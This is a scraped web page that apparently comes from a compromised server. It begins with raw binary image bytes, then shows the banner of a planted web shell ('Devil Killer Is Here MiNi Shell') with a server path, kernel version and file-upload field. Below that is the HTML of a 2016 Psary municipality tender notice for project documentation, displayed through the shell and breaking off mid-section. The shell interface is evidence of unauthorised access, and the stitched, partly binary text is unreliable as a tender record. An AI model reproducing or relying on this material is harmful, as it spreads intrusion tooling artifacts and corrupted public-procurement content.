JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160223/40444-N-2016.html

<p class="kh_header"><b>Psary: Opracowanie kompletnych dokumentacji projektowych w podziale na dwie odrębne części.
Część Nr 1:
Zagospodarowanie terenu placu przy Ośrodku Pomocy Społecznej w Psarach na działkach nr 349 i 351, placu przy Ochotniczej Straży Pożarnej w Preczowie na działce nr 929/4, placu przy Ochotniczej Straży Pożarnej w Strzyżowicach na działce nr 702/1
Część Nr 2:
Zagospodarowanie terenu przy Zespole Szkolno-Przedszkolnym nr 2 w Sarnowie na działkach nr 311 i 292/1 i przy Klubie Sportowym w Sarnowie na działce 1016/1 z aktualizacją projektu budynku szatni i trybun</b><br>
<b>Numer ogłoszenia: 40444 - 2016; data zamieszczenia: 23.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Psarach , ul. Malinowicka 4, 42-512 Psary, woj. śląskie, tel. 32 294 49 00 wew. 41, faks 32 294 49 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.psary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie kompletnych dokumentacji projektowych w podziale na dwie odrębne części.
Część Nr 1:
Zagospodarowanie terenu placu przy Ośrodku Pomocy Społecznej w Psarach na działkach nr 349 i 351, placu przy Ochotniczej Straży Pożarnej w Preczowie na działce nr 929/4, placu przy Ochotniczej Straży Pożarnej w Strzyżowicach na działce nr 702/1
Część Nr 2:
Zagospodarowanie terenu przy Zespole Szkolno-Przedszkolnym nr 2 w Sarnowie na działkach nr 311 i 292/1 i przy Klubie Sportowym w Sarnowie na działce 1016/1 z aktualizacją projektu budynku szatni i trybun.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Opracowanie kompletnych dokumentacji projektowych w podziale na dwie odrębne części.
Część Nr 1:
Zagospodarowanie terenu placu przy Ośrodku Pomocy Społecznej w Psarach na działkach nr 349 i 351, placu przy Ochotniczej Straży Pożarnej w Preczowie na działce nr 929/4, placu przy Ochotniczej Straży Pożarnej w Strzyżowicach na działce nr 702/1
Część Nr 2:
Zagospodarowanie terenu przy Zespole Szkolno-Przedszkolnym nr 2 w Sarnowie na działkach nr 311 i 292/1 i przy Klubie Sportowym w Sarnowie na działce 1016/1 z aktualizacją projektu budynku szatni i trybun.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.32.00.00-7, 71.24.70.00-1, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie  ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie  wykonał co najmniej na:
a) Część Nr 1-  dwie usługi  polegające na wykonaniu opracowań projektowych 
			o  wartości  min. 8 000,00 zł.  (osiem tysięcy) zł brutto każda.
			obejmujące swym zakresem projekty siłowni zewnętrznej. 
b) Część Nr 2-  dwie usługi  polegające na wykonaniu opracowań projektowych  
			na   budowę lub przebudowę lub rozbudowę lub 
			 modernizację  infrastruktury sportowej o  wartości 
			 min. 15 000,00 zł. (piętnaście tysięcy) zł. brutto każda.
Na potwierdzenie powyższego warunku Zamawiający żąda:
a) Wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu,   a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi  zostały wykonane,  wg załącznika nr 4, oraz załączeniem:
b) Dowodów, czy usługi zostały wykonane lub są wykonywane należycie. 
UWAGA 1: Zgodnie z Rozporządzeniem Prezesa rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane za dowody, o których mowa w pkt. b uznaje się: - poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert; - oświadczenie wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej; 3) W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w uwadze nr 1. 4) W razie konieczności, szczególnie gdy wykaz lub dowody, o których mowa w pkt.b) budzą wątpliwości Zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi, były wykonane o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio zamawiającemu. UWAGA 2: Należy wykazać i przedłożyć dowody wykonania usług w liczbie i zakresie wystarczającym do wykazania spełniania opisanych wyżej warunków. UWAGA 3: W przypadku składania oferty na dwie części należy wykazać spełnienie warunków dla każdej z części osobno.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje:
na: 1.  Część Nr 1 i 2
a)  min 1 osobą posiadającą uprawnienia do projektowania w specjalności 
                 architektonicznej lub konstrukcyjno budowlanej bez ograniczeń, 
b) min 1 osobą posiadającą uprawnienia do projektowania w specjalności 
                 drogowej bez ograniczeń, 
W celu oceny spełniania przez Wykonawcę warunku  Zamawiający żąda:
a) Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami  wg. załącznika nr 5
b) Oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień wg. zapisów w załączniku nr 5.
UWAGA 4:  W przypadku składania oferty na dwie części wykonawca może wykazać dysponowanie tymi  samymi osobami</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Należy wykazać i przedłożyć dowody wykonania usług w liczbie i przedmiocie wystarczającym do wykazania spełniania opisanego wyżej warunku w sekcji III.3.2;;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy - w zależności do Nr Części zał Nr 1,1a, do SIWZ. 2) Pełnomocnictwo ustanowione do reprezentowania Wykonawcy-ów ubiegającego-cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy składać w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie. 3) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Treść zobowiązania podmiotu trzeciego powinna określać m.in.: dane pozwalające na identyfikację stron, zakres udostępnienia (np: w zakresie wiedzy i doświadczenia , potencjału technicznego), cel i czas udostępnienia. 4) W celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów Zamawiający może żądać od wykonawcy dokumentów dotyczących w szczególności: a) zakresu dostępnych wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Termin realizacji - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian w umowie w następującym zakresie: 
1. Przedłużenie terminu wykonania przedmiotu umowy (aneks terminowy), w przypadkach:
a) nie wynikających z winy Wykonawcy  i nie możliwych do przewidzenia w chwili zawarcia umowy t.j. wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne  i poza kontrolą stron umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się  z umowy,
b) niezawinione przez Wykonawcę opóźnienia ze strony organów  w wydawaniu uzgodnień, opinii i decyzji administracyjnych, konieczność dokonania zmian w dokumentacji w trakcie projektowania w przypadku wniesienia uwag przez gestorów sieci bądź inne podmioty, zmiany w przepisach prawnych powodujące konieczność pozyskania nieprzewidzianych wcześniej uzgodnień, opinii i innych dokumentów niezbędnych dla prawidłowej realizacji inwestycji,
c) konieczność wykonania zamówień dodatkowych, o których mowa w art.67 ust.1 pkt 5 Ustawy, których wykonanie jest niezbędne dla prawidłowego wykonania  oraz zakończenia podstawowego przedmiotu zamówienia wraz ze wszystkimi konsekwencjami występującymi w związku z przedłużeniem tego terminu.
2. Zmiany w przedmiocie zamówienia dotyczące:
a) zmiany w zakresie przedmiotu zamówienia, jeżeli konieczność wprowadzenia takiej zmiany jest skutkiem zmiany przepisów prawa,
b) aktualizacji  rozwiązań projektowych z uwagi na zmiany technologiczne w zakresie robót budowlanych bądź zmiany obowiązujących przepisów prawa,
c) konieczność wprowadzenia do zakresu przedmiotu umowy ewentualnych opracowań dodatkowych lub zamiennych, w szczególności wynikających z zaistniałych na etapie projektowania nieprzewidzianych uwarunkowań technicznych, formalno-prawnych, których nie można było przewidzieć w chwili zawarcia umowy, 
d) wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usuniecie rozbieżności i doprecyzowanie umowy z celu jednoznacznej interpretacji jej zapisów przez strony,
e) rezygnacji przez Zamawiającego z realizacji części przedmiotu umowy.
f) Do każdej propozycji zmiany, inicjujący zmianę przedstawi:
- opis propozycji zmiany, w tym wpływ na terminy wykonania,
- uzasadnienie zmiany,
3. Zamawiający przewiduje zmianę wynagrodzenia wykonawcy  (ceny) w przypadku: 
1) ustawowej zmiany stawki podatku VAT obowiązującej w dacie powstania obowiązku podatkowego w czasie trwania umowy.
2) zmiany wysokości wynagrodzenia należnego wykonawcy za pełnienie nadzoru autorskiego - w przypadku zmiany:
a) wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
b) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne 
- jeżeli zmiany te będą miały wpływa na koszty wykonania zamówienia przez Wykonawcę, każda ze stron w celu dokonania zmiany wynagrodzenia może wystąpić z takim żądaniem do drugiej strony Umowy. Zmiana umowy może nastąpić po upływie 12 miesięcy od daty podpisania umowy.
3) W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany umowy z przyczyn, o których mowa powyżej Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie wskazanej zmiany.   
4) Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony.
5) Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawiera  uzasadnienie faktyczne i prawne.
6) Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formy pisemnej jest dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych.
4. Zmiana projektanta wskazanego w ofercie  na pisemny wniosek Wykonawcy lub Zamawiającego w przypadku:
a) śmierci, choroby lub innych niezależnych zdarzeń losowych wskazanych osób
b) nie wywiązywania się w/w osób z obowiązków wynikających z umowy
c) jeżeli zmiana stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np.: rezygnacji)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.psary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Psarach ul. Malinowicka 4, 42-512 Psary, I piętro pokój 104.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2016 godzina 10:00, miejsce: Urząd Gminy w Psarach ul. Malinowicka 4, 42-512 Psary, kancelaria ogólna - parter budynku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie kompletnych dokumentacji projektowych w podziale na dwie odrębne części.
Część Nr 1:
Zagospodarowanie terenu placu przy Ośrodku Pomocy Społecznej w Psarach na działkach nr 349 i 351, placu przy Ochotniczej Straży Pożarnej w Preczowie na działce nr 929 4, placu przy Ochotniczej Straży Pożarnej w Strzyżowicach na działce nr 702/1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie kompletnych dokumentacji projektowo-kosztorysowych obejmujących projekty budowlano-wykonawcze, kosztorysy inwestorskie i przedmiary robót, specyfikacje techniczne wykonania i odbioru robót budowlanych oraz inne opracowania niezbędne do spełnienia wszystkich zakładanych funkcji oraz niezbędne do uzyskania pozwolenia na budowę lub zgłoszenia zamiaru rozpoczęcia robót budowlanych wraz z uzyskaniem ostatecznych decyzji o pozwoleniu na budowę lub braku sprzeciwu do zgłoszenia robót budowlanych i sprawowaniem nadzoru autorskiego w trakcie realizacji inwestycji, w następującym zakresie:
